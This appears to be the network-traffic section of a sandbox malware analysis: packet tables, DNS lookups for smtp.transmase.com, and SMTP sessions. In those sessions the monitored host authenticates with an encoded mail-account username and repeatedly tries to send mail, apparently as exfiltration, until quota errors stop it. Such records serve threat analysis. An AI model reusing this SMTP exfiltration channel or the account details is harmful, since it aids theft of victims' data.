May 14, 2022 11:38:33.138474941 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:33.191013098 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:33.435726881 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:33.637151957 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:33.637434006 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:33.848023891 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:33.894282103 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:33.995237112 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:34.196006060 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:34.196283102 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:35.580670118 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:35.790086031 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:35.801145077 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:35.801289082 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.010725021 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.010962009 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.027163982 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.027412891 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.237903118 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.238543987 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.247857094 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.248081923 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.248332024 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.459139109 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.459332943 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.459573984 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.470254898 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.470462084 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.681509018 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.681957006 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.693423033 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.693746090 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.909193039 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.909476995 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:36.917265892 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:36.919039965 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:37.132623911 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:37.133021116 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:37.152249098 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:37.152755022 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:37.371928930 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:37.372351885 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:37.374053955 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:37.374274015 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:37.594011068 CEST | 587 | 49839 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:37.594284058 CEST | 49839 | 587 | 192.168.2.3 | 208.91.198.38
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 11:37:05.487682104 CEST | 57421 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:37:05.688388109 CEST | 53 | 57421 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:37:05.738382101 CEST | 65358 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:37:05.757062912 CEST | 53 | 65358 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:37:14.516261101 CEST | 53802 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:37:15.395394087 CEST | 53 | 53802 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:37:15.838098049 CEST | 65266 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:37:15.871031046 CEST | 53 | 65266 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:16.653938055 CEST | 52427 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:16.672384024 CEST | 53 | 52427 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:16.733551025 CEST | 62724 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:17.050725937 CEST | 53 | 62724 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:30.725126028 CEST | 64941 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:30.743849039 CEST | 53 | 64941 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:31.564668894 CEST | 55403 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:31.583493948 CEST | 53 | 55403 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:35.546118975 CEST | 54960 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:35.562371969 CEST | 53 | 54960 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:35.564305067 CEST | 61877 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:35.579952955 CEST | 53 | 61877 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:35.750690937 CEST | 64624 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:35.769515038 CEST | 53 | 64624 | 8.8.8.8 | 192.168.2.3
May 14, 2022 11:38:35.771682024 CEST | 64412 | 53 | 192.168.2.3 | 8.8.8.8
May 14, 2022 11:38:35.789570093 CEST | 53 | 64412 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 14, 2022 11:37:05.487682104 CEST | 192.168.2.3 | 8.8.8.8 | 0x8403 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.738382101 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b7f | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:37:14.516261101 CEST | 192.168.2.3 | 8.8.8.8 | 0x1f6c | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.838098049 CEST | 192.168.2.3 | 8.8.8.8 | 0x4812 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.653938055 CEST | 192.168.2.3 | 8.8.8.8 | 0x68c4 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.733551025 CEST | 192.168.2.3 | 8.8.8.8 | 0x1399 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:30.725126028 CEST | 192.168.2.3 | 8.8.8.8 | 0x442e | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:31.564668894 CEST | 192.168.2.3 | 8.8.8.8 | 0x8729 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:35.546118975 CEST | 192.168.2.3 | 8.8.8.8 | 0xea2 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:35.564305067 CEST | 192.168.2.3 | 8.8.8.8 | 0xf929 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:35.750690937 CEST | 192.168.2.3 | 8.8.8.8 | 0x114d | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
May 14, 2022 11:38:35.771682024 CEST | 192.168.2.3 | 8.8.8.8 | 0x9bf3 | Standard query (0) | smtp.transmase.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 14, 2022 11:37:05.688388109 CEST | 8.8.8.8 | 192.168.2.3 | 0x8403 | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:37:05.688388109 CEST | 8.8.8.8 | 192.168.2.3 | 0x8403 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.688388109 CEST | 8.8.8.8 | 192.168.2.3 | 0x8403 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.688388109 CEST | 8.8.8.8 | 192.168.2.3 | 0x8403 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.688388109 CEST | 8.8.8.8 | 192.168.2.3 | 0x8403 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.757062912 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b7f | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:37:05.757062912 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b7f | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.757062912 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b7f | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.757062912 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b7f | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:05.757062912 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b7f | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.395394087 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6c | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:37:15.395394087 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6c | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.395394087 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6c | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.395394087 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6c | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.395394087 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f6c | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.871031046 CEST | 8.8.8.8 | 192.168.2.3 | 0x4812 | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:37:15.871031046 CEST | 8.8.8.8 | 192.168.2.3 | 0x4812 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.871031046 CEST | 8.8.8.8 | 192.168.2.3 | 0x4812 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.871031046 CEST | 8.8.8.8 | 192.168.2.3 | 0x4812 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:37:15.871031046 CEST | 8.8.8.8 | 192.168.2.3 | 0x4812 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.672384024 CEST | 8.8.8.8 | 192.168.2.3 | 0x68c4 | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:38:16.672384024 CEST | 8.8.8.8 | 192.168.2.3 | 0x68c4 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.672384024 CEST | 8.8.8.8 | 192.168.2.3 | 0x68c4 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.672384024 CEST | 8.8.8.8 | 192.168.2.3 | 0x68c4 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:16.672384024 CEST | 8.8.8.8 | 192.168.2.3 | 0x68c4 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:17.050725937 CEST | 8.8.8.8 | 192.168.2.3 | 0x1399 | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:38:17.050725937 CEST | 8.8.8.8 | 192.168.2.3 | 0x1399 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:17.050725937 CEST | 8.8.8.8 | 192.168.2.3 | 0x1399 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.29 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:17.050725937 CEST | 8.8.8.8 | 192.168.2.3 | 0x1399 | No error (0) | us2.smtp.mailhostbox.com | | 162.222.225.16 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:17.050725937 CEST | 8.8.8.8 | 192.168.2.3 | 0x1399 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.46 | A (IP address) | IN (0x0001)
May 14, 2022 11:38:30.743849039 CEST | 8.8.8.8 | 192.168.2.3 | 0x442e | No error (0) | smtp.transmase.com | us2.smtp.mailhostbox.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 11:38:30.743849039 CEST | 8.8.8.8 | 192.168.2.3 | 0x442e | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.38 | A (IP address) | IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:30.743849039 CEST8.8.8.8192.168.2.30x442eNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:31.583493948 CEST8.8.8.8192.168.2.30x8729No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.562371969 CEST8.8.8.8192.168.2.30xea2No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.579952955 CEST8.8.8.8192.168.2.30xf929No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.769515038 CEST8.8.8.8192.168.2.30x114dNo error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)smtp.transmase.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.38A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.29A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com162.222.225.16A (IP address)IN (0x0001)
                                                May 14, 2022 11:38:35.789570093 CEST8.8.8.8192.168.2.30x9bf3No error (0)us2.smtp.mailhostbox.com208.91.198.46A (IP address)IN (0x0001)
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 14, 2022 11:37:10.559385061 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:37:10.559766054 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:37:10.782027960 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:37:10.783271074 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:37:11.317747116 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:37:11.405200958 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:37:11.628443956 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:37:11.853620052 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:37:11.854393959 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:37:12.079016924 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:37:12.079271078 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:37:12.321695089 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:37:12.857587099 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:37:40.828701973 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:37:40.828891039 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | EHLO 035347
May 14, 2022 11:37:41.049762011 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:37:41.049993992 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:37:41.271897078 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:37:41.496193886 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:37:41.496411085 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:37:42.029009104 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:37:42.108721972 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:37:42.718844891 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:37:42.941464901 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:37:42.941850901 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:37:43.174514055 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:38:17.770459890 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:38:17.770930052 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:38:18.305701971 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:38:18.424050093 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:38:19.221009970 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:38:19.443476915 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:38:19.443802118 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:20.649733067 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:38:22.111876011 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:27.252902985 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:27.453726053 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:38:27.657000065 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:38:27.657284021 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:38:27.858243942 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:38:27.858702898 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:38:28.080161095 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:38:32.531996012 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:38:32.535051107 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
May 14, 2022 11:38:32.734733105 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
May 14, 2022 11:38:32.735054970 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38 | AUTH login YWJvcmRlcmlhc0B0cmFuc21hc2UuY29t
May 14, 2022 11:38:32.935878038 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 14, 2022 11:38:33.138474941 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 235 2.7.0 Authentication successful
May 14, 2022 11:38:33.435726881 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38 | MAIL FROM:<aborderias@transmase.com>
May 14, 2022 11:38:33.637151957 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 250 2.1.0 Ok
May 14, 2022 11:38:33.637434006 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38 | RCPT TO:<aborderias@transmase.com>
May 14, 2022 11:38:33.848023891 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3 | 550 5.4.6 <aborderias@transmase.com>: Recipient address rejected: Email Sending Quota Exceeded
May 14, 2022 11:38:36.027163982 CEST | 587 | 49838 | 208.91.198.38 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 14, 2022 11:38:36.027412891 CEST | 49838 | 587 | 192.168.2.3 | 208.91.198.38 | EHLO 035347
